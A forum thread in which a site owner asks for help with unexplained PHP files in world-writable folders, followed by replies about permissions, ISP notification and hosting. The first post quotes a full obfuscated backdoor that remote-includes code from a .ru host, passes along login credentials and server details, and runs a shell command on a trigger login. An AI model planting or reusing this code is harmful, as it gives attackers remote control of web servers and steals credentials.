think ive been hacked

[mysticfreeman]

i really hope someone can help.. i think that i've been hacked but not sure.. on a certain day and time im finding files all over my sites (SMF forum section was the worst). Now the files are only appearing in sections where my folders are at 757 permissions, nowhere else and have random names that do no belong.. here are the contents:

Code: [Select]

php -> error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hdihzzazbzggc".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} <--

its in php (i have removed the code prefixes. Could anyone please tell me what is happening in this code cos its the same in all the random files..

thanks

[pcwacht]

Google finds : http://www.jaguarpc.com/forums/showthread.php?t=13305
and more hits : http://www.google.nl/search?hl=nl&q=include_once%28base64_decode%28%22aHR0cDovLw%3D%3D%22%29.%22&btnG=Google+zoeken&meta=

advice reduce to 757 to 755, notify isp
Good luck,
John

[mysticfreeman]

thanks for that pcwacht and i would love to reduce to 755 but unfortunately if i do that i have no access to add/remove on any of my websites with WB from what i can gather its because im not the owner of the apache server or something.. its annoying

[kweitzel]

--> ISP .. as soon as possible.

cheers

Klaus

[mysticfreeman]

its definately a hack (thanks for the info pcwacht). I have notified my ISP and tbh i have no NO response from them and there hasnt been any reply or contact back with queries or anything.. very bad i think..

anyone recommend a really good host for WB sites and offering at least 100 addon domains?

thanks

[lanesharon]

I have used ASO for a few years now.  I run a number of websites on one shared account, but I may be moving up into virtual hosting soon.  I can honestly say that in those years, I have had a few problems, but considering my previous hosting accounts, I consider their problems to be 'less than normal' for hosting companies.

They have unlimited domain add ons and subdomans; as well as email accounts and mysql databases.  You can start with a very small plan and work up the ladder as you need to (that is exactly what I have been doing).  They offer shared, virtual, and dedicated hosting.  You can view their plans here:
--> ASO Accounts

[mysticfreeman]

cheers for that lanesharon i have since managed to get myself a new host and these guys are top form

[elogoid]

All I can advice is changing your password every now and then. All the bigger hosting companies have security measures in place but nothing is 100% full proof unfortunitly. I got hacked into my hosting account with godaddy a while back but got everything back. The really bad thing is that the police department explained to me that it could take months before an investigation would be started.
 So your basically on your own. The best thing is to change your password frequently and lock your domains.